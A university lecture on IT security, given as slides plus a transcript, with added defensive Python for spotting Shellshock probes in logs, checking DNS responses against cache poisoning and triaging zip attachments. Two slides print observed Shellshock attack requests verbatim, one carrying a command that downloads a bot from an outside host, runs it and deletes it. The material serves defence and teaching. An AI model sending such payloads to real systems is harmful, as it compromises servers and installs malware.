Securing your IT Environment
HASEGAWA Akiumi
Dept. of Information Engineering
School of Engineering
Chukyo University
Why I am interested in the security field.
At midnight on the last day of the 20th century, I got an e-mail from US-CERT (United States Computer Emergency Response Team).
On that day, we were monitoring our system behavior for the Y2K problem.
The e-mail asked us to shut down machines which were attacking American universities from our university network.
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem of DNS
Concluding remarks
Between “internet” and “the Internet”
“internet” is a term expressing the concept of connecting networks.
The Internet is a global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide.
“The Internet” is not the Web, e-mail, and so on. They are applications on IP networks.
Most famous keyword: CIA
C for Confidentiality: only the intended, authorized persons can access the information.
I for Integrity: maintaining and assuring the accuracy and consistency of data over its entire life cycle.
A for Availability: authorized persons can access the information whenever they want.
Another keyword: AAA
A for Authentication: identifying a user.
A for Authorization: allowing the authenticated user to access services.
A for Accounting: logging the activities of users.
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Current or ongoing problems
Security trends from the Ministry of Internal Affairs and Communications
(figure: trends in security threats, from http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html)
(figure: malware trend 2011 - 2013, from http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm)
Top 10 security threats in this year
(from http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html)
RANK | TYPE of THREAT | AIM of ATTACK
1 | spear phishing by e-mail | information theft
2 | unauthorized computer access | information theft
3 | website tampering or compromise | information theft, denial of service
4 | information leakage from websites | information theft
5 | online banking attacks | information theft
6 | malicious applications for smartphones | information theft
7 | unintended privacy/information leakage in SNS |
8 | information leakage by lost mobile hardware |
9 | ransomware and the like | information theft
10 | denial of service | denial of service
Topics in the last year
The ID and password system is about to die.
Severe bugs in major open source software.
Severe problems in the DNS system/protocol were exposed!
SSL (Secure Sockets Layer) is about to die.
Watering hole attacks: compromised GOM Player site; compromised EmEditor site.
Spear attacks: Sony Pictures Entertainment; ICANN.
The ID and password system is about to die.
Brute force attacks: using randomly generated strings.
Dictionary attacks: using a list/lists of commonly used passwords.
Password list attacks: using a list of ID and password pairs disclosed from some other service.
This type of attack is very successful.
Known password list attacks
Starting date | Target | Successes | Attempts | Success rate
Nov. 2013 to Feb. 2014 | Ticket Pia | ? | ? | ?
5th Feb. | mixi | 370 | |
28th Feb. | mixi | 16972 | |
27th May to 4th June | niconico | 219926 | 2203590 | 9.98%
31st May to 17th June | mixi | 263596 | |
19th June to 23rd June | Ameba | 38280 | 2293543 | 1.7%
23rd June to 24th June | CAPAT | 11502 | ? | ?
28th June to 29th June | Bandai Namco | 14399 | 1796629 | 0.8%
1st July to 28th July | Pointalk, goo | 1265 | ? | ?
13th Aug. | MUJI 無印良品 | 20957 | 4220382 | 0.5%
15th Aug. | Suica point club | 756 | 296000 | 0.3%
22nd Sep. to 23rd Sep. | MUJI 無印良品 | 19 | 18663 | 0.1%
25th Sep. to 26th Sep. | Kuroneko members | 10589 | 1900000 | 5.6%
27th Sep. to 29th Sep. | docomo ID | 6072 | 22500000 | 0.3%
28th Sep. | Sagawa Express | 34161 | ? | ?
LINE account hijacking and fraud
LINE account hijacking is notable this year. Skype accounts are also targeted.
Hijackers ask the victim's friends to buy iTunes cards on their behalf and to tell them the card numbers.
The activities seem to be organized and to follow prepared scripts.
LINE decided to introduce a PIN code to prevent such attacks.
Purpose of such attacks
For money, or for their economy? Professionals said “No, maybe”.
They pointed out that direct monetary damage occurred in only two cases.
It is said that attackers check the completeness of the lists they have.
So, what comes next after these attacks?
News on LINE account hijacking: http://news.yahoo.co.jp/pickup/6143059
Do's and Don'ts in account management
Don'ts:
use easy IDs and passwords
share the same ID and password among services
leave a PC without logging out or locking the screen
Do's:
if possible, use two-step authentication
if not available, use a strong password and write it down in some hidden place
lock the screen or log out before leaving your seat
Defects found in widely used systems
OpenSSL severe bug, known as Heartbleed: raw data in server memory can be disclosed.
SSL 3.0 problem, known as POODLE: encrypted traffic can be decrypted.
DNS cache poisoning problem: the root can be compromised.
Defects found in widely used systems (continued)
bash has a severe bug (known as Shellshock, 24 Sept.): affects Web servers with CGI, NAS (Network Attached Storage) and home routers.
ntpd has a severe bug disclosed this December: for MacOS a hot fix was released; this bug may affect home routers.
Samba problems: affect NAS (Network Attached Storage).
Observed Shellshock attack
Thu, 25 Sep 2014 02:41:59 GMT
209.126.230.72
-
GET / HTTP/1.0
Accept: */*
Host: () { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
Cookie: () { :; }; ping -c 17 209.126.230.74
Observed Shellshock attack
Sun, 28 Sep 2014 03:01:27 GMT
195.140.188.254
-
GET / HTTP/1.0
Host: 150.42.6.190
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
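The probes above are easy to spot in Web server logs, because every header value that abuses the bug begins with the bash function prefix “() {”, which CGI copies into the environment that bash then imports. The detector below is an added example, not code from the lecture: it parses request records in the layout shown on these slides and reports which headers carry that prefix. The sample log is constructed; its first entry reproduces the probe shown above, while the client address 198.51.100.7 and the third entry are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The string bash looked for when importing a function from an environment
# variable: "() {" at the start of the value. The spaces are optional here so
# that minor spacing variations used by scanners are still caught.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


@dataclass
class Request:
    timestamp: str
    client: str
    request_line: str
    headers: Dict[str, str]


@dataclass
class Finding:
    timestamp: str
    client: str
    headers: List[str]  # names of the headers carrying the pattern


def parse_request(entry: str) -> Request:
    """Parse one logged request in the layout used on the slides:
    timestamp, client IP, a '-' placeholder, the request line, then headers."""
    lines = [line.rstrip() for line in entry.strip("\n").splitlines()]
    timestamp, client, _placeholder, request_line = lines[:4]
    headers: Dict[str, str] = {}
    for line in lines[4:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed header lines rather than crashing
            headers[name.strip()] = value.strip()
    return Request(timestamp, client, request_line, headers)


def detect_shellshock(req: Request) -> Optional[Finding]:
    """Return a Finding if any header value starts with the bash function prefix."""
    hits = [name for name, value in req.headers.items() if SHELLSHOCK_RE.search(value)]
    return Finding(req.timestamp, req.client, hits) if hits else None


def scan_log(log: str) -> List[Finding]:
    """Split a log into blank-line-separated requests and return all findings."""
    findings = []
    for entry in re.split(r"\n\s*\n", log.strip()):
        finding = detect_shellshock(parse_request(entry))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log: entry 1 reproduces the probe on the slides, entry 2 is
# a normal request, entry 3 uses tighter spacing that a naive match would miss.
SAMPLE_LOG = """\
Thu, 25 Sep 2014 02:41:59 GMT
209.126.230.72
-
GET / HTTP/1.0
Accept: */*
Host: () { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74
User-Agent: shellshock-scan
Cookie: () { :; }; ping -c 17 209.126.230.74

Thu, 25 Sep 2014 02:45:10 GMT
192.0.2.10
-
GET /index.html HTTP/1.1
Host: www.example.jp
User-Agent: Mozilla/5.0
Accept: text/html

Sun, 28 Sep 2014 03:01:27 GMT
198.51.100.7
-
GET /cgi-bin/status HTTP/1.0
Host: 150.42.6.190
User-Agent: (){ :;}; /bin/true
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.client} shellshock pattern in: {', '.join(f.headers)}")
```

Only headers are inspected, since that is what CGI exports into bash's environment; the same fixed prefix can serve as a WAF or log-alert rule.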
Do you have a broadband router?
Check the configuration ASAP.
Change the administration password. The operation manual can be downloaded from the manufacturer's site.
Some old routers have the HTTP port open to the Internet, and their configuration can be modified via the Web.
If you use a WiFi router, do not use WEP! WEP has severe defects in its design, and attack tools are available.
An emergency patch is necessary for Allied Telesis routers and switches.
The basic software of home routers has a severe bug! dis
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Classification of Malware
Virus
Worm
Trojan horse
Spyware/Adware
Ransomware/Cryptware
Computer Virus
A computer virus is software which tries to copy itself into files or application programs. If this succeeds, the computer is said to be infected.
As side effects, it may destroy files or the system, display messages, or spy on information.
It spreads as an e-mail attachment or through compromised web pages.
Computer Worm
A computer worm is a standalone program that replicates itself to other computers through networks.
The famous song tells that “an inchworm is measuring the marigolds”, and computer worms propagate like such worms.
Whether it harms the system or not, its replication activity may bring heavy congestion to the Internet.
Trojan Horse
A Trojan horse is software which includes malicious code. It looks like a useful/convenient application.
After infection, it may collect critical information and send it out, or open backdoors to the Internet to access or gain control of the system.
Spyware/Adware
Spyware is software that gathers information and sends it outside the system. It may be installed along with free software, with or without the consumer's consent.
Adware is software that displays ads while it is used. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
Ransomware/Cryptware
Such software is installed when you click “yes” on a red pop-up alert which says “Your system is infected”.
It takes control of the screen and displays “pay money” to remove it. It may encrypt files and demand money for the keys to decrypt them.
Watering hole attack
Attackers observe the behavior of the victims: which sites they visit for information.
They compromise the target Web site based on that observation.
When users visit the compromised site, malware is installed on the victims' PCs.
Attackers gain control over those PCs.
Typical cases of watering hole attack
GOM Player distribution site: the GOM Player distribution site was compromised. PCs at the “Monju” nuclear reactor site were compromised via a GOM Player update. Is installing GOM Player allowed???
EmEditor update site: the automatic update site of EmEditor was compromised. Perhaps no harm was done, because the downloader only worked when accesses came from specific IPs.
ISC.ORG was compromised lately: the ISC recommends that those who accessed the site during the compromise scan their machines for malware. The ISC is the main distribution site of sendmail, BIND, and so on.
Agenda
Keywords in Security
Current trends in security
Current topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
To avoid malware infection
Software update every month, but not on black Tuesday (in Japan, it's Wednesday); wait several days or a week.
Anti-malware is necessary! Windows 8 has “Windows Defender” by default.
A personal firewall is needed: block inbound connections, and check outbound connections also!
Do not open e-mail attachments so easily.
Do not say “yes” to pop-up alerts from software instantly!
Easy to say but not easy to do!
Anti-malware/personal firewall may do harm
False negative problems: may allow intrusion or infection. The VirusTotal site is helpful when you get a file or files in doubt.
False positive problems: block necessary communication; erase or quarantine necessary files.
(figure: false positive and false negative, from http://marginalrevolution.com/marginalrevolution/2014/05/type-i-and-type-ii-errors-simplified.html)
False positive is harmful
The routers in my office and at my home are the same brand.
My office to my home is a 30-minute drive.
I released my mobile PC from my office LAN.
When I connected my mobile PC to my home LAN, my personal firewall blocked all connections because of a compromise of the router. And there was no way of unlocking it.
My friend's case
She updated her Firefox.
After the update, she started Firefox again.
She saw a pop-up asking yes or no, and she clicked “yes” almost instantly.
And she has lost her web connection ever since.
Firefox seemed compromised.
(figure: the pop-up reads “for your safety block connection” Yes/No)
Recommended tools for web surfing
Check whether the site is using EV-SSL, especially when using online banking.
Useful add-ons for browsers: RequestPolicy for Firefox; Netcraft toolbar; WOT (Web of Trust), useful for Googlers.
Useful Web page: VirusTotal, https://www.virustotal.com/
(figure: sample of a phishing site)
E-mail handling
HTML format is risky: embedded scripts, embedded Web links. Phishing is done by sending e-mail which includes faked links. Phishing for WebMail account information is increasing.
Be careful of attached files: zip-encoded files are dangerous. If necessary, scan with anti-malware and “VirusTotal” before opening the file.
Spam or phishing mail may come from your friends.
Can we find malware infection?
It is difficult to find malware infection!
Modern(?) malware works quietly to avoid disclosure of its existence.
The types and number of malware are increasing day by day.
Anti-malware vendors have difficulty catching newly developed malware.
In case of malware infection
Don'ts:
hide that your PC is infected
continue using the infected system
use the “System Restore” function for recovery
Do's:
stop using the infected computer!
call the incident response team or the person in charge of the network system of your section and wait for his/her suggestions!
Safe recovery procedure from infection
1. format the hard disk (not a quick format)
2. install the system from read-only media
3. patch it
4. recover data from backup (note: backups can be contaminated)
Recovery from system troubles
MacOS: Time Machine is helpful
Windows 7: System Restore, System Recovery
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
SNS problems
Privacy problems
Cyberstalking
Flaming: a tweet can cause flaming
Sexting/revenge porn
A leak to the Internet is unrecoverable!
Stalking case in Zushi
The murderer made query tweets on SNS to get the victim's address.
He was also using a popular FAQ site to find the victim's address.
He was also using a private detective.
(figure: the Zushi case in a newspaper)
Don'ts in using SNS
disclose geographical information or other private matters (check the EXIF of digital photos)
retweet or reply to someone asking for a person's address or private information
post private photos of yourself or your friends
For more, refer to this site.
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem of DNS
Concluding remarks
The basic problem on the Internet
DNS is a protocol and system to convert domain names to IP addresses.
Ill-configured or ill-managed home routers can be easily compromised. Intruders may change the DNS server configuration. It happened in Mexico.
DNS poisoning is easy: send a fake query and at the same time generate and send fake answers.
If poisoned, users of the poisoned server could be led to a fake server. And you can imagine what happens.
(figure: DNS query mechanism, from https://www.nic.ad.jp/ja/newsletter/No40/0800.html)
Kaminsky attack
(figures: the old cache poisoning attack and the Kaminsky attack)
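What stops a forged answer from entering the cache is the set of checks a resolver applies before trusting it: the response must arrive on the random source port the query went out from, carry the same 16-bit transaction ID, and echo the question exactly, including the randomized letter case of the name (the 0x20 technique). The following is an added example and not the lecture's code: a minimal DNS wire encoder/decoder with a resolver-side acceptance check, where the domain, addresses and forged responses are constructed for illustration. Bailiwick checking of the answer section is left out.

```python
import random
import struct


def encode_name(name: str) -> bytes:
    """Wire-encode a domain name as length-prefixed labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end, jumped = [], offset, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def randomize_case(name: str, rng: random.Random) -> str:
    """DNS 0x20: randomize letter case; an honest server echoes the name as sent."""
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in name)


def build_query(txid: int, qname: str, qtype: int = 1) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def build_response(txid: int, qname: str, ip: str, qtype: int = 1) -> bytes:
    """A minimal A-record answer; the answer name is a pointer to the question."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD, RA
    question = encode_name(qname) + struct.pack("!HH", qtype, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xC0\x0C" + struct.pack("!HHIH", qtype, 1, 300, len(rdata)) + rdata
    return header + question + answer


def new_query(qname: str, rng: random.Random) -> dict:
    """What a hardened resolver remembers about an outstanding query."""
    wire_name = randomize_case(qname, rng)
    txid, port = rng.getrandbits(16), rng.randint(1024, 65535)
    return {"txid": txid, "port": port, "qname": wire_name, "qtype": 1,
            "wire": build_query(txid, wire_name)}


def accept_response(pending: dict, dst_port: int, msg: bytes):
    """Resolver-side checks before a response may enter the cache."""
    if dst_port != pending["port"]:
        return False, "port mismatch"
    if len(msg) < 12:
        return False, "truncated header"
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if txid != pending["txid"]:
        return False, "txid mismatch"
    if not flags & 0x8000:
        return False, "not a response"
    if qdcount != 1:
        return False, "unexpected question count"
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    if qname != pending["qname"]:  # case-sensitive comparison enforces 0x20
        return False, "question mismatch"
    if qtype != pending["qtype"] or qclass != 1:
        return False, "qtype/qclass mismatch"
    return True, "accepted"


def demo() -> dict:
    """Genuine answer versus constructed forgeries that each miss one check."""
    rng = random.Random(2014)  # fixed seed so the run is reproducible
    pending = new_query("www.example.jp", rng)
    genuine = build_response(pending["txid"], pending["qname"], "192.0.2.10")
    wrong_txid = build_response(pending["txid"] ^ 0x0001, pending["qname"], "203.0.113.5")
    wrong_case = build_response(pending["txid"], pending["qname"].swapcase(), "203.0.113.5")
    return {
        "genuine": accept_response(pending, pending["port"], genuine),
        "wrong_port": accept_response(pending, pending["port"] ^ 0x0001, genuine),
        "wrong_txid": accept_response(pending, pending["port"], wrong_txid),
        "wrong_case": accept_response(pending, pending["port"], wrong_case),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label:11s} -> {result}")
```

Each extra check multiplies the number of guesses a forger needs per query; a resolver that uses a fixed port and predictable IDs reduces the whole defense to the 16-bit ID.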
Agenda
Keywords in Security
Current trends in security
Current topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Concluding remarks
Severe problems of the Internet were found in the year 2014.
The ID and password system may end.
Many new malware and tools are being developed daily.
Be careful when you are posting on SNS, etc.
Check and take care of your home routers, network attached storage, TV sets, VDRs, etc. properly.
Basic knowledge about Internet technology is important for your safety.

Lecture about network and host security to NII students

  • 1. Securing your IT Environment HASEGAWA Akiumi Dept. of Information Engineering School of Engineering Chukyo University
  • 2. Why I interested in the Security field. Last midnight of the last day of 20th century, I got an e-mail from US-CERT(United States Computer Emergency Response Team). On the day, we were monitoring our system behavior for Y2K problem. The e-mail asked us to shut down machines which were attacking American universities from our university network.
  • 3. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
  • 4. between “internet” and “the Internet” “internet” is a term of expressing the concept of connecting networks. The Internet is a global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide. “The Internet” is not Web, Email, and so on. They are applications on IP networks.
  • 5. Most famous keyword CIA C for Confidentiality only intended authorized person can access to the information I for Integrity maintaining and assuring the accuracy and consistency of data over its entire life-cycle A for Availability Authorized person can access the information anytime she/he wants
  • 6. Another keyword AAA A for Authentication identifying a user A for Authorization allow the authenticated user to access services A for Accounting log the activities of users
  • 7. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 8. Current or on going problems Security trends from Ministry of Internal Affairs and Communication Current/On going problems
  • 9. Trends in security threat http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
  • 10. Malware trend 2011 - 2013 http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm
  • 11. Top 10 Security Threats in this year http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html RANK TYPE of THREAT AIM of ATTACK 1 Spear phishing by E-Mail information theft 2 unauthorized computer access information theft 3 Website tampering or compromising information theft, Denial of service 4 information leakage from website information theft 5 online banking attacks information theft 6 mal-application for smart phones information theft 7 unintended privacy/information leakage in SNS 8 information leakage by lost mobile hardwares 9 ransom ware a like information theft 10 Denial of Services Denial of services
  • 12. Topics in last year ID and password system is about to die Severe bugs in Major Open Source Softwares Severe problems in DNS system/protcol was exposed! SSL(Secure Socket Layer) is about dying Watering hole attacks compromised GOM player site compromised EmEditor site Spear attacks Sony Picture Entertainment ICANN
  • 13. ID and Password system is about to die. Brute force attacks using randomly generated string Dictionary attacks using a list/lists of commonly used passwords Password list attacks using a list of pairs of ID and password disclosed from some other services This type of attacks is very successful.
  • 14. known password list attacks starting date Target Success Attacks Success Rate Nov. 2013 to Feb. 2014 Ticket Pia ? ? ? 5th, Feb. mixi 370 28th, Feb. mixi 16972 27th, May to 4th, June niconico 219926 2203590 9.98% 31st, May to 17th, June mixi 263596 19th, June to 23rd,June Ameba 38280 2293543 1.7% 23rd,June to 24th, June CAPAT 11502 ? ? 28th, June to 29th, June Bandai-Namco 14399 1796629 0.8% 1st, July to 28th, July Pointalk, goo 1265 ? ? 13th, Aug. MUJI 無印良品 20957 4220382 0.5% 15th, Aug. Suica point club 756 296000 0.3 22nd, Sep. to 23rd, Sep. MUJI 無印良品 19 18663 0.1% 25th, Sep. to 26th, Sep. Kuroneco members 10589 1900000 5.6% 27th, Sep. to 29th, Sep. docomo ID 6072 22500000 0.3% 28th, Sep. Sagawa Express 34161 ? ?
  • 15. Line account Hijacking and fraud Line account hijacking is notable this year. also in Skype accounts are targeted. Hijackers ask friends to buy i-tunes cards instead of them and tell their numbers. the activities seem to be organized and controlled by existing scenarios. Line decides to introduce pin code to avoid such attacks.
  • 16. Purpose of such attacks for Money or their economy? professionals said “No, may be”. They pointed out that direct monetary damages occurred in only two cases. It is said that attackers check the completeness of the lists they have. So, what comes next to these attacks?
  • 17. News on Line account hijacking http://news.yahoo.co.jp/pickup/6143059
  • 18. Do’s and Don’ts in account management Don’ts use easy ID and password share ID and password among services Leave PC without logout or screen lock Do’s if possible, use 2 stage authentication if not available, use strong password and memo it in some hidden place. screen lock or logout before leaving your seat
  • 19. defects found in widely used systems OpenSSL severe bugs known as heart bleed raw data in server memory can be disclosed SSL 3.0 problem known as poodle encryption can be decoded DNS cache poisoning problem root can be compromised
  • 20. defects found in widely used systems bash has a severe bug(known as shell shock, 24 Spet.) Web servers with CGI affect NAS(Network Attatched Storage) and home routers ntpd has a severe bug disclosed in this December for MacOS, hot fix was released This bug may affect home routers Samba problems(NAS) affect NAS(Network Attached Storage)
  • 21. Observed Shell shock Attack Thu, 25 Sep 2014 02:41:59 GMT 209.126.230.72 - GET / HTTP/1.0 Accept: */* Host: () { :; }; ping -c 23 209.126.230.74 Referer: () { :; }; ping -c 11 209.126.230.74 User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash- shellshock-scan-of-internet.html) Cookie: () { :; }; ping -c 17 209.126.230.74
  • 22. Observed Shell Shock Attack Sun, 28 Sep 2014 03:01:27 GMT 195.140.188.254 - GET / HTTP/1.0 Host: 150.42.6.190 User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
  • 23. Do you have broadband routers ? Check the configurations ASAP. Change administration password. Operation manual can be download from manufactures site. Some of old routers have http port opened to the Internet, and the configurations can be modified by Web. If you use WiFi routers, do not use WEP! WEP has severe defects in its design. attack tools are available. Emergency patch is necessary for Allied- Telesis routers and switches Basic software of home routers has severe bug! dis
  • 24. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 25. Classification of Malware Virus Worm Trojan horse Spyware/Adware Ransomware/Cryptware
• 26. Computer Virus A computer virus is software that tries to copy itself into files or application programs. If it succeeds, the computer is said to be infected. As side effects it may destroy files or the system, display messages, or spy on information. It spreads as an email attachment or through compromised web pages.
• 27. Computer Worm A computer worm is a standalone program that replicates itself to other computers through networks. The famous song tells that "an inchworm is measuring the marigolds", and computer worms propagate like such worms. Whether it harms the system or not, its replication activity may bring heavy congestion to the Internet.
• 28. Trojan Horse A Trojan horse is software that includes malicious code. It looks like a useful or convenient application. After infection it may collect critical information and send it out, or open backdoors to the Internet so that the attacker can access or gain control of the system.
• 29. Spyware/Adware Spyware is software that gathers information and sends it outside the system. It may be installed together with free software, with or without the consumer's consent. Adware is software that displays ads while it is used. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
• 30. Ransomware/Cryptware Such software is installed when you click "yes" on a red popup alert that says "Your system is infected". It takes control of the screen and displays "pay money" to remove it. It may also encrypt files and demand money for the keys to decrypt them.
• 32. Watering hole attack Attackers observe where the victims go for information. They compromise that Web site based on the observation. When users visit the compromised site, malware is installed on the victims' PCs. Attackers then gain control over those PCs.
• 33. Typical Cases of Watering hole attack
GOM player distribution site: the GOM player distribution site was compromised. PCs at the "Monju" nuclear reactor site were compromised via a GOM player update. Is installing GOM player allowed there???
EmEditor update site: the automatic update site of EmEditor was compromised. Possibly no harm was done, because the downloader only worked when accesses came from specific IPs.
ISC.ORG compromised recently: the ISC recommends that those who accessed the site during the compromise scan their machines for malware. The ISC is the main distribution site of BIND, sendmail, and so on.
  • 34. Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
• 35. To avoid malware infection: Software update every month, but not on black Tuesday (Patch Tuesday; in Japan it is Wednesday): wait several days or a week. Anti-malware is necessary! Windows 8 has "Windows Defender" by default. A personal firewall is needed: block inbound connections, and check outbound connections too! Do not open email attachments so easily. Do not say "yes" to software pop-up alerts instantly! Easy to say but not easy to do!
• 36. Anti-malware/personal firewalls may do harm. False negatives may allow intrusion or infection; the VirusTotal site is helpful when you get a file you are unsure about. False positives block necessary communication, or erase/quarantine necessary files.
• 38. A false positive is harmful: The routers at my office and at home are the same brand. My office to my home is a 30-minute drive. I release my mobile PC from my office LAN. When I connect my mobile PC to my home LAN, my personal firewall blocks all connections, claiming a compromise of the router. And no way of unlocking is present.
• 39. My friend's case: She updated her Firefox. After the update, she started Firefox again. She saw a pop-up asking yes or no, and she clicked "yes" almost instantly. And she has lost web connection ever since. (The pop-up: "Firefox seems compromised. For your safety, block connection? Yes/No")
• 40. Recommended tools for web surfing: check whether the site is using EV-SSL, especially when using online banking. Useful add-ons for browsers: RequestPolicy for Firefox; Netcraft toolbar; WOT (Web of Trust), useful for Googlers. Useful Web page: VirusTotal https://www.virustotal.com/
• 42. E-Mail handling: HTML format is risky: embedded scripts, embedded Web links. Phishing is done by sending email that includes a faked link; phishing for WebMail account information is increasing. Be careful with attached files: zipped files are dangerous (anti-malware cannot look inside a password-protected zip). If necessary, scan with anti-malware and VirusTotal before opening the file. Spam or phishing mail may come from your friends.
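Slides 36 and 42 both say to check a doubtful attachment with anti-malware and VirusTotal before opening it. The script below is an added example, not part of the lecture: it inspects a zip attachment without opening any member in an application, records each member's SHA-256 so it can be looked up on VirusTotal by hash (which reveals nothing about the file's content, unlike an upload), and raises the red flags a practitioner checks by hand: executables, macro-enabled documents, double extensions, a PE header under a harmless name, password protection (which defeats scanners), and extreme compression ratios. The sample zip is constructed inline; the extension lists are assumptions, not a published policy.

```python
import hashlib
import io
import zipfile

# Assumed lists: extend them to match your environment.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe",
                   "wsf", "hta", "lnk", "ps1", "jar"}
MACRO_EXTS = {"docm", "xlsm", "pptm", "dotm"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def _inspect_member(name: str, data: bytes, encrypted: bool, ratio: float) -> list[str]:
    """Heuristics a practitioner applies before double-clicking anything."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    flags = []
    if encrypted:
        flags.append("password-protected member: anti-malware cannot scan it")
    if ext in EXECUTABLE_EXTS:
        flags.append(f"executable content (.{ext})")
    if ext in MACRO_EXTS:
        flags.append(f"macro-enabled Office document (.{ext})")
    if len(parts) > 2 and parts[-2] in DOCUMENT_EXTS and ext in EXECUTABLE_EXTS:
        flags.append("double extension disguising a program as a document")
    if data[:2] == b"MZ" and ext not in EXECUTABLE_EXTS:
        flags.append("Windows PE header under a non-executable name")
    if ratio > 100:
        flags.append(f"extreme compression ratio ({ratio:.0f}x): possible zip bomb")
    return flags


def triage_zip(blob: bytes) -> list[dict]:
    """List every member with its SHA-256 (for a VirusTotal hash lookup) and any red flags."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            encrypted = bool(info.flag_bits & 0x1)          # general-purpose bit 0
            data = b"" if encrypted else zf.read(info.filename)
            ratio = info.file_size / info.compress_size if info.compress_size else 0.0
            findings.append({
                "name": info.filename,
                "size": info.file_size,
                "sha256": hashlib.sha256(data).hexdigest() if not encrypted else None,
                "flags": _inspect_member(info.filename, data, encrypted, ratio),
            })
    return findings


def is_suspicious(findings: list[dict]) -> bool:
    return any(f["flags"] for f in findings)


def build_sample_attachment() -> bytes:
    """Constructed sample: the kind of 'invoice' zip that phishing mail carries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.")
        zf.writestr("report.docm", b"PK\x03\x04 stand-in for a macro-enabled document")
        zf.writestr("notes.txt", b"Please see the attached invoice.")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_attachment()):
        print(f["name"], f["sha256"], f["flags"] or "clean")
```

Only the hash leaves your machine when you query VirusTotal with it; upload the file itself only when the hash is unknown and the content is not confidential.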
• 43. Can we find malware infection? It is difficult! Modern malware works quietly to avoid disclosing its existence. The types and number of malware are increasing day by day. Anti-malware vendors have difficulty catching newly developed malware.
• 44. In case of malware infection, Don'ts: hide that your PC is infected; continue using the infected system; use the "System Restore" function for recovery (the restore points may already contain the malware).
• 45. In case of malware infection, Do's: Stop using the infected computer! Call the incident response team or the person in charge of your section's network, and wait for his/her suggestions!
